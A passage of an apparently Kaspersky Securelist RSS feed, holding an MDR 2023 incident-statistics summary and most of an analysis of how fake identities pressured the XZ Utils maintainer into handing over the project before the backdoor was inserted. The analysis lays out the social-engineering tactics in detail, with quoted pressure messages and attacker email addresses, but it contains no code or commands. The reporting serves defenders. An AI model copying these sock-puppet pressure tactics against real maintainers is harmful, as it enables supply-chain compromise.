  688. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-scaled.jpg" width="2618" height="1527"><media:keywords>full</media:keywords></media:content>
  689. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-1024x597.jpg" width="1024" height="597"><media:keywords>large</media:keywords></media:content>
  690. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-300x175.jpg" width="300" height="175"><media:keywords>medium</media:keywords></media:content>
  691. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  692. </item>
  693. <item>
  694. <title>Managed Detection and Response in 2023</title>
  695. <link>https://securelist.com/kaspersky-mdr-report-2023/112411/</link>
  696. <comments>https://securelist.com/kaspersky-mdr-report-2023/112411/#respond</comments>
  698. <dc:creator><![CDATA[Kaspersky Security Services]]></dc:creator>
  699. <pubDate>Tue, 30 Apr 2024 09:00:40 +0000</pubDate>
  700. <category><![CDATA[SOC, TI and IR posts]]></category>
  701. <category><![CDATA[Industrial threats]]></category>
  702. <category><![CDATA[Internal Threats Statistics]]></category>
  703. <category><![CDATA[MDR]]></category>
  704. <category><![CDATA[Security services]]></category>
  705. <category><![CDATA[Security technology]]></category>
  706. <category><![CDATA[Targeted attacks]]></category>
  707. <category><![CDATA[Internal threats]]></category>
  708. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112411</guid>
  709.  
  710. <description><![CDATA[The report covers the tactics, techniques and tools most commonly deployed by threat actors, the nature of incidents detected and their distribution among MDR customers.]]></description>
  711. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03142303/Kaspersky_MDR_Report_Eng_2023_01.pdf" target="_blank" rel="noopener">Managed Detection and Response in 2023 (PDF)</a></p>
  712. <p>Alongside other security solutions, we provide Kaspersky Managed Detection and Response (MDR) to organizations worldwide, delivering expert monitoring and incident response 24/7. The task involves collecting telemetry for analysis by both machine-learning (ML) technologies and our dedicated Security Operations Center (SOC). On detection of a security incident, SOC puts forward a response plan, which, if approved by the customer, is actioned at the endpoint protection level. In addition, our experts give recommendations on organizing incident investigation and response.</p>
  713. <p>In the annual MDR report, we present the results of analysis of SOC-detected incidents, supplying answers to the following questions:</p>
  714. <ul>
  715. <li>Who are your potential attackers?</li>
  716. <li>How do they currently operate?</li>
  717. <li>How to detect their actions?</li>
  718. </ul>
  719. <p>The report covers the tactics, techniques and tools most commonly used by threat actors, the nature of high-severity incidents and their distribution among MDR customers by geography and industry.</p>
  720. <h2 id="security-incident-statistics-for-2023">Security incident statistics for 2023</h2>
  721. <h3 id="security-events">Security events</h3>
  722. <p>In 2023, Kaspersky Managed Detection and Response handled more than 431,000 alerts about possible suspicious activity. Of these, more than 117,000 were analyzed by ML technologies, and over 314,000 by SOC analysts. Of the manually processed security events, slightly under 90% turned out to be false positives. What is more, around 32,000 security alerts were linked to approximately 14,000 incidents reported to MDR customers.</p>
  723. <h3 id="geographic-distribution-of-users">Geographic distribution of users</h3>
  724. <p>In 2023, the largest concentration of Kaspersky MDR customers was in the European region (38%). In second place came Russia and the CIS (28%), in third the Asia-Pacific region (16%).</p>
  725. <div id="attachment_112506" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112506" class="size-large wp-image-112506" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-1024x508.jpeg" alt="Distribution of Kaspersky MDR customers by region, 2023" width="1024" height="508" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-1024x508.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-300x149.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-768x381.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-1536x762.jpeg 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-705x350.jpeg 705w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-740x367.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-564x280.jpeg 564w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-800x397.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01.jpeg 1640w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112506" class="wp-caption-text">Distribution of Kaspersky MDR customers by region, 2023</p></div>
  726. <h3 id="distribution-of-incidents-by-industry">Distribution of incidents by industry</h3>
  727. <p>Since the number of incidents largely depends on the scale of monitoring, the most objective picture is given by the distribution of the ratio of the number of incidents to the number of monitored endpoints. The diagram below shows the expected number of incidents of a given criticality per 10,000 endpoints, broken down by industry.</p>
  728. <div id="attachment_112507" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112507" class="size-large wp-image-112507" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-1024x683.jpeg" alt="Expected number of incidents of varying degrees of criticality per 10,000 endpoints in different industries, 2023" width="1024" height="683" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-1024x683.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-300x200.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-768x512.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-525x350.jpeg 525w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-740x494.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-420x280.jpeg 420w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-800x534.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02.jpeg 1181w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112507" class="wp-caption-text">Expected number of incidents of varying degrees of criticality per 10,000 endpoints in different industries, 2023</p></div>
  729. <p>In 2023, the most incidents per 10,000 devices were detected in mass media organizations, development companies and government agencies.</p>
  730. <p>In terms of absolute number of incidents detected, the largest number of incidents worldwide in 2023 were recorded in the financial sector (18.3%), industrial enterprises (16.9%) and government agencies (12.5%).</p>
  731. <div id="attachment_112508" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112508" class="size-large wp-image-112508" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-1024x524.jpeg" alt="Distribution of the number of Kaspersky MDR customers, all identified incidents and critical incidents by industry, 2023" width="1024" height="524" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-1024x524.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-300x153.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-768x393.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-685x350.jpeg 685w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-740x378.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-548x280.jpeg 548w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-800x409.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03.jpeg 1508w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112508" class="wp-caption-text">Distribution of the number of Kaspersky MDR customers, all identified incidents and critical incidents by industry, 2023</p></div>
  732. <h2 id="general-observations-and-recommendations">General observations and recommendations</h2>
  733. <p>Based on the analysis of incidents detected in 2023, and on our many years of experience, we can identify the following trends in security incidents and protection measures:</p>
  734. <ul>
  735. <li>Every year we identify targeted attacks carried out with direct human involvement. To effectively detect such attacks, besides conventional security monitoring, threat hunting is required.</li>
  736. <li>The effectiveness of the defense mechanisms deployed by enterprises is best measured by a range of offensive exercises. Year after year, we see rising interest in projects of this kind.</li>
  737. <li>In 2023, we identified fewer high-severity malware incidents than in previous years, but the number of incidents of medium and low criticality increased. The most effective approach to guarding against such incidents is through multi-layered protection.</li>
  738. <li>Leveraging the MITRE ATT&amp;CK<sup>®</sup> knowledge base supplies additional contextual information for attack detection and investigation teams. Even the most sophisticated attacks consist of simple steps and techniques, with detection of just a single step often uncovering the entire attack.</li>
  739. </ul>
  740. <p>Detailed information about attacker tactics, techniques and tools, incident detection and response statistics, and defense recommendations can be found in the <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03142303/Kaspersky_MDR_Report_Eng_2023_01.pdf" target="_blank" rel="noopener">full report (PDF)</a>.</p>
  741. ]]></content:encoded>
  743. <wfw:commentRss>https://securelist.com/kaspersky-mdr-report-2023/112411/feed/</wfw:commentRss>
  744. <slash:comments>0</slash:comments>
  747. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue.jpg" width="2449" height="1632"><media:keywords>full</media:keywords></media:content>
  748. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-1024x682.jpg" width="1024" height="682"><media:keywords>large</media:keywords></media:content>
  749. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-300x200.jpg" width="300" height="200"><media:keywords>medium</media:keywords></media:content>
  750. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  751. </item>
  752. <item>
  753. <title>Assessing the Y, and How, of the XZ Utils incident</title>
  754. <link>https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/</link>
  755. <comments>https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/#comments</comments>
  757. <dc:creator><![CDATA[GReAT]]></dc:creator>
  758. <pubDate>Wed, 24 Apr 2024 10:10:31 +0000</pubDate>
  759. <category><![CDATA[Incidents]]></category>
  760. <category><![CDATA[Linux]]></category>
  761. <category><![CDATA[Social engineering]]></category>
  762. <category><![CDATA[Supply-chain attack]]></category>
  763. <category><![CDATA[Targeted attacks]]></category>
  764. <category><![CDATA[XZ]]></category>
  765. <category><![CDATA[APT (Targeted attacks)]]></category>
  766. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112476</guid>
  767.  
  768. <description><![CDATA[In this article we analyze social engineering aspects of the XZ backdoor incident. Namely pressuring the XZ maintainer to pass on the project to Jia Cheong Tan, and then urging major downstream maintainers to commit the backdoored code to their projects.]]></description>
  769. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>High-end APT groups perform highly interesting social engineering campaigns in order to penetrate well-protected targets. For example, carefully constructed forum responses on precision targeted accounts and follow-up &#8220;out-of-band&#8221; interactions regarding underground rail system simulator software helped deliver <a href="https://securelist.com/unraveling-the-lamberts-toolkit/77990/#green-lambert" target="_blank" rel="noopener">Green Lambert</a> implants in the Middle East. And, in what seems to be a learned approach, the <a href="https://tukaani.org/xz-backdoor/" target="_blank" rel="noopener">XZ Utils project penetration</a> was likely a patient, multi-year approach, both planned in advance but somewhat clumsily executed.</p>
  770. <p>This recently exposed offensive effort slowly introduced a small cast of remote characters, communications, and malicious code to the more than decade old open-source project XZ Utils and its maintainer, Lasse Collin. The backdoor code was inserted in February and March 2024, mostly by Jia Cheong Tan, likely a fictitious identity. The end goal was to covertly implement an exclusive use backdoor in sshd by targeting the XZ Utils build process, and push the backdoored code to the major Linux distributions as a part of a large-scale supply chain attack.</p>
  771. <p>While this highly targeted and interactive social engineering approach might not be completely novel, it is extraordinary. Also extraordinary is the stunningly subtle insertion of malicious code leveraging the build process in plain sight. This build process focus during a major supply chain attack is comparable only to the CozyDuke/DarkHalo/APT29/NOBELIUM <a href="https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/" target="_blank" rel="noopener">Solarwinds compromise</a> and the <a href="https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/" target="_blank" rel="noopener">SUNSPOT</a> implant&#8217;s cunning and persistent presence – its monitoring capability for the execution of a Solarwinds build, and its malicious code insertion during any Solarwinds build execution. Only this time, it&#8217;s human involvement in the build process.</p>
  772. <p>It&#8217;s notable that one of the key differentiators of the Solarwinds incident from prior supply chain attacks was the adversary&#8217;s covert, prolonged access to the source/development environment. In this XZ Utils incident, this prolonged access was obtained via social engineering and extended with fictitious human identity interactions in plain sight.</p>
  773. <p>One of the best <a href="https://research.swtch.com/xz-timeline" target="_blank" rel="noopener">publicly available chronological timelines</a> on the social engineering side of the XZ Utils incident is posted by Russ Cox, currently a Google researcher. It&#8217;s highly recommended reading. Notably, Cox writes: &#8220;This post is a detailed timeline that I have constructed of the social engineering aspect of the attack, which appears to date back to late 2021.&#8221;</p>
  774. <h2 id="a-singaporean-guy-an-indian-guy-and-a-german-guy-walk-into-a-bar">A Singaporean guy, an Indian guy, and a German guy walk into a bar…</h2>
  775. <p>Three identities pressure XZ Utils creator and maintainer Lasse Collin in summer 2022 to provoke an open-source code project handover: Jia Tan/Jia Cheong Tan, Dennis Ens, and Jigar Kumar. These identities are made up of a GitHub account, three free email accounts with similar name schemes, an IRC and Ubuntu One account, email communications on XZ Utils <a href="https://www.mail-archive.com/xz-devel@tukaani.org/" target="_blank" rel="noopener">developer mailing lists</a> and downstream maintainers, and code. Their goal was to grant full access to XZ Utils source code to Jia Tan and subtly introduce malicious code into XZ Utils – the identities even interact with one another on mail threads, complaining about the need to replace Lasse Collin as the XZ Utils maintainer.</p>
  776. <p>Note that the geographic dispersion of fictitious identities is a bit forced here, perhaps to dispel hints of coordination: Singaporean or Malaysian (possibly of a Hokkien dialect), northern European, and Indian. Misspellings and grammar mistakes are similar across the three identities&#8217; communications. The &#8220;Jia Tan&#8221; identity seems a bit forced as well – the only public geolocation data is a <a href="https://boehs.org/node/everything-i-know-about-the-xz-backdoor#:~:text=I%20received%20an%20email%20that,and%20activity%20on%20March%2029th.&amp;text=Running%20a%20Nmap%20on%20the,feel%20like%20proximity%20becomes%20plausible." target="_blank" rel="noopener">Singaporean VPN exit node</a> that the identity may have used on March 29 to access the XZ Utils Libera IRC chat. If constructing a fictitious identity, using that particular exit node would definitely be a selected resource.</p>
  777. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112478" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01.png" alt="" width="911" height="337" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01.png 911w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-300x111.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-768x284.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-740x274.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-757x280.png 757w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-800x296.png 800w" sizes="(max-width: 911px) 100vw, 911px" /></a></p>
  778. <p>Our pDNS confirms this IP as a Witopia VPN exit. While we might expect a &#8220;jiat75&#8221; or &#8220;jiatan018&#8221; username for the &#8220;Jia Tan&#8221; Libera IRC account, this one in the screenshot above may have been used on March 29, 2024 by the &#8220;JiaT75&#8221; actor.</p>
  779. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112479" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1024x108.png" alt="" width="1024" height="108" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1024x108.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-300x32.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-768x81.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1536x162.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-740x78.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1600x169.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-800x85.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02.png 1647w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  780. <p>One additional identity, Hans Jansen, <a href="https://github.com/tukaani-project/xz/pull/53" target="_blank" rel="noopener">introduced</a> a June 2023 performance optimization into the XZ Utils source, committed by Collin, and later leveraged by jiaT75&#8217;s backdoor code. Jia Tan gleefully accepted the proposed IFUNC additions: &#8220;Thanks for the PR and the helpful links! Overall this seems like a nice improvement to our function-picking strategy for CRC64. It will likely be useful when we implement CRC32 CLMUL too :)&#8221;.</p>
  781. <p>This pull request is the Jansen identity&#8217;s only interaction with the XZ Utils project itself. And, unlike the other two identities, the Jansen account is not used to pressure Collin to turn over XZ Utils maintenance. Instead, the Hans Jansen identity provided the code and then disappeared. Nine months later, following the backdoor code insertion, Jansen urged a major Linux vendor in the supply chain to incorporate the backdoored XZ Utils code in their distribution. The identity resurfaced on a <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708" target="_blank" rel="noopener">Debian bug report</a> on March 24, 2024, creating an opportunity to generate urgency in including the backdoored code in the Debian distribution.</p>
  782. <h2 id="jia-tan-identity-and-activity">Jia Tan Identity and Activity</h2>
  783. <p>The Jia Cheong Tan (JiaT75) GitHub account, eventually promoted to co-maintainer of XZ Utils, which inserted the malicious backdoor code, was created January 26, 2021. JiaT75 was not exclusively involved in XZ Utils, having authored over 500 patches to multiple GitHub projects going back to early 2022.</p>
  784. <ul>
  785. <li>oss-fuzz</li>
  786. <li>cpp-docs</li>
  787. <li>wasmtime</li>
  788. <li>xz</li>
  789. </ul>
  790. <p>These innocuous patches helped to build the identity of JiaT75 as a legitimate open source contributor and potential maintainer for the XZ Utils project. The patch efforts helped to establish a relationship with Lasse Collin as well.</p>
  791. <p>The first JiaT75 code contribution to XZ Utils occurred on October 29, 2021. It was sent to the xz-devel mailing list. It was a very simple editor config file introduction. Following this initial innocuous addition, over the next two years, JiaT75 <a href="https://git.tukaani.org/?p=xz.git;a=search;h=HEAD;pg=4;s=jia+tan;st=author" target="_blank" rel="noopener">authored</a> hundreds of changes for the XZ project.</p>
  792. <p>Yes, JiaT75 contributed code on both weekends and what appear to be workdays. However, an interesting anomaly is that the 2024 malicious commits occur out of sync with many previous commits. A Huntress researcher going by the alias &#8220;<a href="https://x.com/birchb0y/status/1773871381890924872" target="_blank" rel="noopener">Alden</a>&#8221; posted a visualization of the malicious Jia Tan commits to XZ Utils. JiaT75 commits the malicious code completely out of sync with prior work times on Feb 23–26, and March 8 and 9, 2024.</p>
  793. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03.jpg" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112480" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-1024x683.jpg" alt="" width="1024" height="683" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-1024x683.jpg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-300x200.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-768x512.jpg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-525x350.jpg 525w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-740x493.jpg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-420x280.jpg 420w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-800x533.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03.jpg 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  794. <p>The time differences for the malicious commits is noticeable. What might this anomaly suggest? We speculate on several possibilities:</p>
  795. <ul>
  796. <li>the JiaT75 account was used by a second party to insert the malicious code, either known or unknown to the individual contributor.</li>
  797. <li>the JiaT75 individual contributor was rushed to commit the malicious backdoor code.</li>
  798. <li>the JiaT75 account was run by a team of individuals and one part of the team needed to work without interruption outside of the usual constructed work day.</li>
  799. </ul>
  800. <p>Especially devious is the manner in which the obfuscated backdoor code is introduced in multiple separate pieces by JiaT75. Even though it was open-source, the bulk of the backdoor does not show up in the XZ source-code tree, is not human readable, and was not recognized.</p>
  801. <h2 id="summer-2022-pressure-to-add-a-maintainer">Summer 2022 Pressure to Add a Maintainer</h2>
  802. <p>Multiple identities of interest pressured Lasse Collin to add a maintainer over the summer of 2022. The intensity of pressure on Collin varies per account, but they all create opportunities to pressure Collin and interact.</p>
  803. <table width="100%">
  804. <tbody>
  805. <tr>
  806. <td width="22%"><strong>Name</strong></td>
  807. <td width="22%"><strong>GitHub Account</strong></td>
  808. <td width="34%"><strong>Email</strong></td>
  809. <td width="22%"><strong>Creation</strong></td>
  810. </tr>
  811. <tr>
  812. <td>Jia Tan/Jia Cheong Tan</td>
  813. <td>JiaT75</td>
  814. <td>jiat0218@gmail.com</td>
  815. <td>January 26, 2021</td>
  816. </tr>
  817. <tr>
  818. <td>Dennis Ens</td>
  819. <td>&#8211;</td>
  820. <td>dennis3ns@gmail.com</td>
  821. <td>&#8211;</td>
  822. </tr>
  823. <tr>
  824. <td>Jigar Kumar</td>
  825. <td>&#8211;</td>
  826. <td>jigarkumar17@protonmail.com</td>
  827. <td>&#8211;</td>
  828. </tr>
  829. </tbody>
  830. </table>
  831. <p>If we take the first interaction on the xz-devel mailing list as the start of the campaign, Jia Tan sent a <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00512.html" target="_blank" rel="noopener">superficial code patch</a> on September 29, 2021. This timestamp is eight months after the github account creation date. This initial contribution is harmless, but establishes this identity within the open-source project.</p>
  832. <p>A year later, Jigar Kumar pressured Lasse Collin to hand over access to Jia Tan over the spring and summer of 2022 in six chiding comments over two different threads.</p>
  833. <table width="100%">
  834. <tbody>
  835. <tr>
  836. <td width="40%">Wed, 27 Apr 2022 11:42:57 -0700</td>
  837. <td width="60%"><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00555.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
  838. </tr>
  839. <tr>
  840. <td colspan="2">Your efforts are good but based on the slow release schedule it will unfortunatly be years until the community actually gets this quality of life feature.</td>
  841. </tr>
  842. <tr>
  843. <td>Thu, 28 Apr 2022 10:10:48 -0700</td>
  844. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00557.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
  845. </tr>
  846. <tr>
  847. <td colspan="2">Patches spend years on this mailing list. 5.2.0 release was 7 years ago. There<br />
  848. is no reason to think anything is coming soon.</td>
  849. </tr>
  850. <tr>
  851. <td>Fri, 27 May 2022 10:49:47 -0700</td>
  852. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00565.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
  853. </tr>
  854. <tr>
  855. <td colspan="2">Over 1 month and no closer to being merged. Not a suprise.</td>
  856. </tr>
  857. <tr>
  858. <td>Tue, 07 Jun 2022 09:00:18 -0700</td>
  859. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00566.html" target="_blank" rel="noopener">Re: [xz-devel] XZ for Java</a></td>
  860. </tr>
  861. <tr>
  862. <td colspan="2">Progress will not happen until there is new maintainer. XZ for C has sparse<br />
  863. commit log too. Dennis you are better off waiting until new maintainer happens<br />
  864. or fork yourself. Submitting patches here has no purpose these days. The<br />
  865. current maintainer lost interest or doesn&#8217;t care to maintain anymore. It is sad<br />
  866. to see for a repo like this.</td>
  867. </tr>
  868. <tr>
  869. <td>Tue, 14 Jun 2022 11:16:07 -0700</td>
  870. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00568.html" target="_blank" rel="noopener">Re: [xz-devel] XZ for Java</a></td>
  871. </tr>
  872. <tr>
  873. <td colspan="2">With your current rate, I very doubt to see 5.4.0 release this year. The only<br />
  874. progress since april has been small changes to test code. You ignore the many<br />
  875. patches bit rotting away on this mailing list. Right now you choke your repo.<br />
  876. Why wait until 5.4.0 to change maintainer? Why delay what your repo needs?</td>
  877. </tr>
  878. <tr>
  879. <td>Wed, 22 Jun 2022 10:05:06 -0700</td>
  880. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00570.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
  881. </tr>
  882. <tr>
  883. <td colspan="2">&#8220;Is there any progress on this? Jia I see you have recent commits. Why can&#8217;t you<br />
  884. commit this yourself?&#8221;</td>
  885. </tr>
  886. </tbody>
  887. </table>
  888. <p>The Dennis Ens identity sets up a thread of their own, and follows up by pressuring maintainer Collin in one particularly forceful and obnoxious message to the list. The identity leverages a personal vulnerability that Collin shared on this thread. The Jigar Kumar identity responds twice to this thread, bitterly complaining about the maintainer: &#8220;Dennis you are better off waiting until new maintainer happens or fork yourself.&#8221;</p>
  889. <table width="100%">
  890. <tbody>
  891. <tr>
  892. <td width="40%">Thu, 19 May 2022 12:26:03 -0700</td>
  893. <td width="60%"><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00562.html" target="_blank" rel="noopener">XZ for Java</a></td>
  894. </tr>
  895. <tr>
  896. <td colspan="2">Is XZ for Java still maintained? I asked a question here a week ago<br />
  897. and have not heard back. When I view the git log I can see it has not<br />
  898. updated in over a year. I am looking for things like multithreaded<br />
